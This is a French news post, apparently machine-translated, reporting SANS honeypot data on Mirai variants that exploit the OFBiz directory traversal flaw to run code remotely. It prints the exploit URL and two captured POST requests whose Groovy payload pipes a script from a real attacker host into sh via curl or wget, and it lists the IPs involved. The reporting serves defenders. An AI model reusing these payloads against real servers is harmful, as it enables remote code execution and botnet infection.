{"id":1264147,"date":"2024-08-02T13:58:58","date_gmt":"2024-08-02T15:58:58","guid":{"rendered":"https:\/\/teknomers.com\/fr\/le-botnet-mirai-ciblant-les-serveurs-ofbiz-est-vulnerable-a-la-traversee-de-repertoires\/"},"modified":"2024-08-02T13:59:03","modified_gmt":"2024-08-02T15:59:03","slug":"le-botnet-mirai-ciblant-les-serveurs-ofbiz-est-vulnerable-a-la-traversee-de-repertoires","status":"publish","type":"post","link":"https:\/\/teknomers.com\/fr\/le-botnet-mirai-ciblant-les-serveurs-ofbiz-est-vulnerable-a-la-traversee-de-repertoires\/","title":{"rendered":"Le botnet Mirai ciblant les serveurs OFBiz est vuln\u00e9rable \u00e0 la travers\u00e9e de r\u00e9pertoires"},"content":{"rendered":"<p> <br \/>\n<\/p>\n<div>\n<p><span class=\"p-author\"><i class=\"icon-font icon-calendar\">\ue802<\/i><span class=\"author\">02 ao\u00fbt 2024<\/span><i class=\"icon-font icon-user\">\ue804<\/i><span class=\"author\">L&#8217;actualit\u00e9 des hackers<\/span><\/span><span class=\"p-tags\">Vuln\u00e9rabilit\u00e9 \/ S\u00e9curit\u00e9 du r\u00e9seau<\/span><\/p>\n<\/div>\n<div id=\"articlebody\">\n<div class=\"separator\" style=\"clear: both;\"><a rel=\"nofollow\" href=\"https:\/\/teknomers.com\/fr\/wp-content\/uploads\/2024\/08\/Le-botnet-Mirai-ciblant-les-serveurs-OFBiz-est-vulnerable-a.jpg\" style=\"clear: left; display: block; float: left; text-align: center;\"><\/a><\/div>\n<p>Les logiciels de planification des ressources de l&#8217;entreprise (ERP) sont au c\u0153ur de nombreuses entreprises qui prennent en charge les ressources humaines, la comptabilit\u00e9, l&#8217;exp\u00e9dition et la fabrication. Ces syst\u00e8mes peuvent devenir tr\u00e8s complexes et difficiles \u00e0 entretenir. Ils sont souvent hautement personnalis\u00e9s, ce qui peut rendre la mise \u00e0 jour des correctifs difficile. Cependant, des vuln\u00e9rabilit\u00e9s critiques continuent d&#8217;affecter ces syst\u00e8mes et mettent en danger les donn\u00e9es commerciales critiques. <\/p>\n<p>Le centre de temp\u00eate Internet du SANS <a rel=\"nofollow noopener\" href=\"https:\/\/isc.sans.edu\/diary\/Increased%20Activity%20Against%20Apache%20OFBiz%20CVE-2024-32113\/31132\" target=\"_blank\">a publi\u00e9 un rapport<\/a> montrant comment le framework ERP open source OFBiz est actuellement la cible de nouvelles vari\u00e9t\u00e9s du botnet Mirai.<\/p>\n<p>Dans le cadre de son vaste portefeuille de projets, la Fondation Apache soutient <a rel=\"nofollow noopener\" href=\"https:\/\/ofbiz.apache.org\/\" target=\"_blank\">OFBiz<\/a>un framework bas\u00e9 sur Java pour la cr\u00e9ation d&#8217;applications ERP (Enterprise Resource Planning). OFBiz semble \u00eatre <a rel=\"nofollow noopener\" href=\"https:\/\/6sense.com\/tech\/erp\/apache-ofbiz-market-share\" target=\"_blank\">beaucoup moins r\u00e9pandu<\/a> que les alternatives commerciales. Cependant, comme pour tout autre syst\u00e8me ERP, les organisations s&#8217;appuient sur lui pour les donn\u00e9es commerciales sensibles, et la s\u00e9curit\u00e9 de ces syst\u00e8mes ERP est essentielle.<\/p>\n<p>En mai de cette ann\u00e9e, un <a rel=\"nofollow noopener\" href=\"https:\/\/lists.apache.org\/thread\/w6s60okgkxp2th1sr8vx0ndmgk68fqrd\" target=\"_blank\">mise \u00e0 jour de s\u00e9curit\u00e9 critique<\/a> a \u00e9t\u00e9 publi\u00e9 pour OFBiz. La mise \u00e0 jour a corrig\u00e9 une vuln\u00e9rabilit\u00e9 de travers\u00e9e de r\u00e9pertoire qui pouvait conduire \u00e0 l&#8217;ex\u00e9cution de commandes \u00e0 distance. Les versions d&#8217;OFBiz ant\u00e9rieures \u00e0 18.12.13 ont \u00e9t\u00e9 affect\u00e9es. Quelques semaines plus tard, <a rel=\"nofollow noopener\" href=\"https:\/\/xz.aliyun.com\/t\/14733\" target=\"_blank\">d\u00e9tails sur la vuln\u00e9rabilit\u00e9<\/a> ont \u00e9t\u00e9 rendus publics.<\/p>\n<p>Les vuln\u00e9rabilit\u00e9s de travers\u00e9e de r\u00e9pertoire, ou de travers\u00e9e de chemin, peuvent \u00eatre utilis\u00e9es pour contourner les r\u00e8gles de contr\u00f4le d&#8217;acc\u00e8s. Par exemple, si un utilisateur peut acc\u00e9der \u00e0 un r\u00e9pertoire \u00ab \/public \u00bb mais pas \u00e0 un r\u00e9pertoire \u00ab \/admin \u00bb, un attaquant peut utiliser une URL comme \u00ab \/public\/..\/admin \u00bb pour tromper la logique de contr\u00f4le d&#8217;acc\u00e8s. R\u00e9cemment, la CISA et le FBI <a rel=\"nofollow noopener\" href=\"https:\/\/www.cisa.gov\/resources-tools\/resources\/secure-design-alert-eliminating-directory-traversal-vulnerabilities-software\" target=\"_blank\">a publi\u00e9 une alerte<\/a> dans le cadre de l&#8217;initiative \u00ab\u00a0Secure by Design\u00a0\u00bb, ax\u00e9e sur la travers\u00e9e de r\u00e9pertoires. La CISA a soulign\u00e9 qu&#8217;elle surveillait actuellement 55 vuln\u00e9rabilit\u00e9s de travers\u00e9e de r\u00e9pertoires dans le cadre du catalogue \u00ab\u00a0Known Exploited Vulnerabilities\u00a0\u00bb (KEV).<\/p>\n<p>Pour OFBiz, la travers\u00e9e du r\u00e9pertoire est facilement d\u00e9clench\u00e9e en ins\u00e9rant un point-virgule. Tout ce qu&#8217;un attaquant doit trouver est une URL \u00e0 laquelle il peut acc\u00e9der et ajouter un point-virgule suivi d&#8217;une URL restreinte. L&#8217;URL d&#8217;exploitation que nous voyons actuellement est :<\/p>\n<p><code><\/p>\n<pre>\/webtools\/control\/forgotPassword;\/ProgramExport<\/pre>\n<p><\/code><\/p>\n<p>Comme les utilisateurs doivent pouvoir r\u00e9initialiser leurs mots de passe sans se connecter au pr\u00e9alable, \u00ab\u00a0forgotPassword\u00a0\u00bb ne n\u00e9cessite aucune authentification. \u00ab\u00a0ProgramExport\u00a0\u00bb, en revanche, doit \u00eatre contr\u00f4l\u00e9 par l&#8217;acc\u00e8s et inaccessible \u00e0 moins que l&#8217;utilisateur ne soit connect\u00e9. \u00ab\u00a0ProgramExport\u00a0\u00bb est particuli\u00e8rement dangereux dans la mesure o\u00f9 il permet l&#8217;ex\u00e9cution de code arbitraire. Une logique d\u00e9fectueuse dans OFBiz a arr\u00eat\u00e9 d&#8217;\u00e9valuer l&#8217;URL au point-virgule. Cela a permis \u00e0 n&#8217;importe quel utilisateur, sans se connecter, d&#8217;acc\u00e9der \u00e0 la deuxi\u00e8me partie de l&#8217;URL, \u00ab\u00a0\/ProgramExport\u00a0\u00bb. <\/p>\n<p>Un attaquant doit utiliser une requ\u00eate POST pour exploiter la vuln\u00e9rabilit\u00e9, mais n&#8217;a pas n\u00e9cessairement besoin d&#8217;un corps de requ\u00eate. \u00c0 la place, un param\u00e8tre d&#8217;URL fera parfaitement l&#8217;affaire. <\/p>\n<p>Le <a rel=\"nofollow noopener\" href=\"https:\/\/isc.sans.edu\/\" target=\"_blank\">Centre de temp\u00eate Internet SANS<\/a> utilise un vaste r\u00e9seau de pots de miel pour d\u00e9tecter les tentatives d&#8217;exploitation d&#8217;un large \u00e9ventail de vuln\u00e9rabilit\u00e9s des applications Web. Les nouvelles tentatives d&#8217;exploitation importantes sont r\u00e9sum\u00e9es dans un \u00ab<a rel=\"nofollow noopener\" href=\"https:\/\/isc.sans.edu\/weblogs\/firstseenurls.html\" target=\"_blank\">Vu la premi\u00e8re fois<\/a>&#8221; rapport. Ce week-end, ces capteurs ont d\u00e9tect\u00e9 une augmentation significative des tentatives d&#8217;exploitation de CVE-2024-32213, la vuln\u00e9rabilit\u00e9 de travers\u00e9e de r\u00e9pertoire OFBiz mentionn\u00e9e ci-dessus, qui a \u00e9t\u00e9 imm\u00e9diatement reprise par le rapport &#8221; First Seen &#8220;.<\/p>\n<div class=\"separator\" style=\"clear: both;\"><a rel=\"nofollow\" href=\"https:\/\/teknomers.com\/fr\/wp-content\/uploads\/2024\/08\/Le-botnet-Mirai-ciblant-les-serveurs-OFBiz-est-vulnerable-a.png\" style=\"clear: left; display: block; float: left; text-align: center;\"><img decoding=\"async\" src=\"https:\/\/teknomers.com\/fr\/wp-content\/uploads\/2024\/08\/Le-botnet-Mirai-ciblant-les-serveurs-OFBiz-est-vulnerable-a.png\" alt=\"\" border=\"0\" data-original-height=\"352\" data-original-width=\"728\"\/><\/a><\/div>\n<p>Les tentatives d&#8217;exploitation provenaient de deux adresses IP diff\u00e9rentes qui \u00e9taient \u00e9galement associ\u00e9es \u00e0 diverses tentatives d&#8217;exploitation d&#8217;appareils IoT, g\u00e9n\u00e9ralement associ\u00e9es aux vari\u00e9t\u00e9s actuelles du botnet \u00ab Mirai \u00bb.<\/p>\n<p>Les malfaiteurs ont utilis\u00e9 deux versions de l&#8217;exploit. La premi\u00e8re utilisait l&#8217;URL pour inclure la commande que l&#8217;exploit \u00e9tait cens\u00e9 ex\u00e9cuter :<\/p>\n<p><code><\/p>\n<pre>POST \/webtools\/control\/forgotPassword;\/ProgramExport?groovyProgram=groovyProgram=throw+new+Exception('curl https:\/\/95.214.27.196\/where\/bin.sh<\/pre>\n<p><\/code> <\/p>\n<p>Le second utilisait le corps de la requ\u00eate pour la commande, ce qui est plus courant pour les requ\u00eates \u00ab POST \u00bb :<\/p>\n<p>  <code><\/p>\n<pre>POST \/webtools\/control\/forgotPassword;\/ProgramExport HTTP\/1.1\nUser-Agent: Mozilla\/5.0 (Linux; Linux x86_64; en-US) Gecko\/20100101 Firefox\/122.0\nHost: [victim IP address]\nAccept: *\/*\nUpgrade-Insecure-Requests: 1\nConnection: keep-alive\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 147\ngroovyProgram=throw+new+Exception('curl https:\/\/185.196.10.231\/sh | sh -s ofbiz || wget -O- https:\/\/185.196.10.231\/sh | sh -s ofbiz'.execute().text);\n<\/pre>\n<p><\/code> <\/p>\n<p>Malheureusement, ni le script \u00ab bin.sh \u00bb ni le script \u00ab sh \u00bb n&#8217;ont \u00e9t\u00e9 r\u00e9cup\u00e9r\u00e9s. Les adresses IP ont \u00e9t\u00e9 impliqu\u00e9es dans des analyses le 29 juillet, \u00e0 l&#8217;aide de l&#8217;agent utilisateur \u00ab KrebsOnSecurity \u00bb, un clin d&#8217;\u0153il au blogueur infosec Brian Krebs. Cependant, les URL analys\u00e9es \u00e9taient pour la plupart des parasites, \u00e0 la recherche de shells Web existants laiss\u00e9s par des attaques pr\u00e9c\u00e9dentes. L&#8217;adresse IP a \u00e9galement \u00e9t\u00e9 utilis\u00e9e pour distribuer un fichier appel\u00e9 \u00ab botx.arm \u00bb. Ce nom de fichier est souvent associ\u00e9 aux variantes de Mirai.<\/p>\n<p>Avec l&#8217;annonce de la vuln\u00e9rabilit\u00e9 en mai, nous attendions des analyses pour tirer parti de la vuln\u00e9rabilit\u00e9 OFBiz. L&#8217;exploitation \u00e9tait triviale, et bien que la population vuln\u00e9rable et expos\u00e9e soit petite, cela n&#8217;a pas arr\u00eat\u00e9 les attaquants dans le pass\u00e9. Mais ils exp\u00e9rimentent maintenant au moins et ajoutent peut-\u00eatre la vuln\u00e9rabilit\u00e9 \u00e0 des bots comme les variantes de Mirai.<\/p>\n<p>Il n&#8217;y a que quelques adresses IP impliqu\u00e9es\u00a0:<\/p>\n<ul style=\"text-align: left;\">\n<li><a rel=\"nofollow noopener\" href=\"https:\/\/isc.sans.edu\/ipinfo\/95.214.27.196\" target=\"_blank\">95.214.27.196<\/a>:Envoi d&#8217;un exploit en tant que param\u00e8tre d&#8217;URL et h\u00e9bergement de logiciels malveillants.<\/li>\n<li><a rel=\"nofollow noopener\" href=\"https:\/\/isc.sans.edu\/ipinfo\/83.222.191.62\" target=\"_blank\">83.222.191.62<\/a>: Envoi d&#8217;un exploit en tant que corps de requ\u00eate. Logiciel malveillant h\u00e9berg\u00e9 sur 185.196.10.231. D\u00e9but juillet, cette adresse IP a recherch\u00e9 des vuln\u00e9rabilit\u00e9s IoT.<\/li>\n<li><a rel=\"nofollow noopener\" href=\"https:\/\/isc.sans.edu\/ipinfo\/185.196.10.231\" target=\"_blank\">185.196.10.231<\/a>: h\u00e9berger des logiciels malveillants<\/li>\n<\/ul>\n<p>Si vous avez trouv\u00e9 cet article int\u00e9ressant et souhaitez approfondir le monde de la s\u00e9curisation des applications Web, des API et des microservices, vous pouvez me rejoindre \u00e0 Network Security 2024 (du 4 au 9 septembre) pour <a rel=\"nofollow noopener\" href=\"https:\/\/www.sans.org\/cyber-security-courses\/application-security-securing-web-apps-api-microservices\/?utm_medium=Sponsored_Content&amp;utm_source=Hacker_News&amp;utm_content=JU_OFBiz_Servers_Article_THN_NetSec24_SEC522&amp;utm_campaign=SANS_Network_Security_2024&amp;utm_rdetail=NA&amp;utm_goal=Orders&amp;utm_type=Live_Training_Events\" target=\"_blank\">mon cours, SEC522<\/a>. <a rel=\"nofollow noopener\" href=\"https:\/\/www.sans.org\/mlp\/networksecurity\/?utm_medium=Sponsored_Content&amp;utm_source=Hacker_News&amp;utm_content=JU_OFBiz_Servers_Article_THN_NetSec24&amp;utm_campaign=SANS_Network_Security_2024&amp;utm_rdetail=NA&amp;utm_goal=Orders&amp;utm_type=Live_Training_Events\" target=\"_blank\">D\u00e9couvrez tout ce qui vous attend lors de l&#8217;\u00e9v\u00e9nement ici.<\/a><\/p>\n<p><\/p>\n<div class=\"cf note-b\">Vous avez trouv\u00e9 cet article int\u00e9ressant ? <span class=\"\">Cet article est une contribution de l\u2019un de nos pr\u00e9cieux partenaires.<\/span> Suivez-nous sur <a rel=\"nofollow noopener\" href=\"https:\/\/twitter.com\/thehackersnews\" target=\"_blank\">Twitter <i class=\"icon-font icon-twitter\">\uf099<\/i><\/a>  et <a rel=\"nofollow noopener\" href=\"https:\/\/www.linkedin.com\/company\/thehackernews\/\" target=\"_blank\">LinkedIn<\/a> pour lire davantage de contenu exclusif que nous publions.<\/div>\n<\/div>\n<p><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script><br \/>\n<br \/><br \/>\n<br \/><a href=\"https:\/\/thehackernews.com\/2024\/08\/mirai-botnet-targeting-ofbiz-servers.html\" rel=\"nofollow noopener\" target=\"_blank\">ttn-fr-57<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\ue80202 ao\u00fbt 2024\ue804L&#8217;actualit\u00e9 des hackersVuln\u00e9rabilit\u00e9 \/ S\u00e9curit\u00e9 du r\u00e9seau Les logiciels de planification des ressources de l&#8217;entreprise (ERP) sont au c\u0153ur de nombreuses entreprises qui prennent en charge les ressources humaines, la comptabilit\u00e9, l&#8217;exp\u00e9dition et la fabrication. Ces syst\u00e8mes peuvent devenir tr\u00e8s complexes et difficiles \u00e0 entretenir. Ils sont souvent hautement personnalis\u00e9s, ce qui peut [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1264148,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[238714,200292,238582,240744,238778,5464,4175,4168,4165,40,65,238584,200271,46101,238334,98340,221841,245182,238617,4172,4169,8541,12284,4166,238583,4891],"class_list":["post-1264147","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-technologie","tag-actualites-des-hackers","tag-actualites-sur-la-cybersecurite","tag-actualites-sur-la-cybersecurite-aujourdhui","tag-actualites-sur-le-cyberespace","tag-actualites-sur-le-piratage-informatique","tag-botnet","tag-ciblant","tag-comment-pirater","tag-cyber-attaques","tag-est","tag-les","tag-les-nouvelles-des-hackers","tag-logiciel-malveillant-rancongiciel","tag-mirai","tag-mises-a-jour-cybernetiques","tag-mises-a-jour-de-cybersecurite","tag-ofbiz","tag-repertoires","tag-securite-de-linformation","tag-securite-informatique","tag-securite-internet","tag-serveurs","tag-traversee","tag-violation-de-donnees","tag-vulnerabilite-du-logiciel","tag-vulnerable"],"_links":{"self":[{"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/posts\/1264147","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/comments?post=1264147"}],"version-history":[{"count":0,"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/posts\/1264147\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/media\/1264148"}],"wp:attachment":[{"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/media?parent=1264147"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/categories?post=1264147"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/tags?post=1264147"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}